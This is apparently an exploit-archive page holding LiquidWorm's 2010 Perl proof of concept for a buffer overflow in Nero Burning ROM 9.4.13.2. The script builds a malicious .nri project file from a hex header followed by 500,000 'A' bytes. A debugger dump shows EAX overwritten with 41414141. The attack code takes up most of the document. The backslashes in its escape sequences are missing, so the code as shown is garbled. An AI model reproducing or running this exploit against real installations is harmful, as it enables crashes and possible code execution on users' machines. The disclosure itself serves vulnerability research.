Nero Burning ROM v9.4.13.2 (iso compilation) Local Buffer Invasion PoC

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Nero Burning ROM v9.4.13.2 (iso compilation) Local Buffer Invasion PoC
# Published : 2010-02-22
# Author : LiquidWorm
# Previous Title : Winamp 5.57 (Browser) IE Denial of Service Exploit
# Next Title : VKPlayer 1.0 (.mid) Denial of Service Exploit

#!/usr/bin/perl
#
#
# Title: Nero Burning ROM 9 (iso compilation) Local Buffer Invasion Proof Of Concept
#
#
# Product web page: http://www.nero.com
# Version tested: 9.4.13.2
# OS platform used: Microsoft Windows XP Professional SP3 (English)
#
# Registers pick'a'chu:
# ------------------------------------------------------------------------
#
# (adc.b30): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=41414141 ebx=00000000 ecx=0012ecf0 edx=00000000 esi=04c8acc8 edi=00e29890
# eip=0057f53c esp=0012ec38 ebp=0012ed28 iopl=0         nv up ei pl nz na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
# Nero+0x17f53c:
# 0057f53c 394204          cmp     dword ptr [edx+4],eax ds:0023:00000004=????????
#
# ------------------------------------------------------------------------
#
# Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic
#
# liquidworm gmail com
#
# Zero Science Lab - http://www.zeroscience.org
#
# 30.09.2009
#
# Advisory: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4927.php
#


           
              ##          ##
             #  #        #  #
            #    #      #    #
           #O     #    #     O#
          #[*]     #  #     [*]#
                   ####
              $id="xFFxFE".
 	   "xFFx0Ex4Ex00".
          "x65x00x72x00x6F".
        "x00x49x00x53x00x4F".
      #####===###_O----O_###===##### 
      "x00x30x00x2Ex00x30x00".
      "x33x00x2Ex00x30x00x31".
        "x00x0Bx00x00x00x01".
         "x00x00x00x00x00".
                "x10x4E".
                  "x45".
                  "x52".
                  "x4F".
        "x20x42x55x52x4Ex49".
     "x4E".    "x47x20".   "x52".
   "x4F".    "x4Dx00x00".    "x00".
   "x9C".   "x20xBCx4Ax9C". "x20".
    "xBC".    "x4AxFFxFF".  "xFF".
    "xFF".    "xFFxFFxFF".  "xFF".
   "x00".       "x00x00".     "x00".
   "x9F".    "x20".   "xBC".  "x4A".
   "x01".  "x00".       "x00"."x00".
    "x00". "x00".       "x00"."x00".
    "x01"."x00x00". "x00x01"."x00".
    "x00".                       "x00".
    "x01".                       "x00".
     "x00".                     "x00".
     "x00".                     "x00".
       "x00".                 "x00";
###############################################
###############################################



							$fl="Neeero.nri";$op="x41" x 500000;
							open nri, ">./$fl" || die "nCan't open $fl: $!";
							print nri $id.$op;
							print "n ~ Invasion started...n";
							sleep 1;close nri;
							print "n ~ File $fl invaded host.n";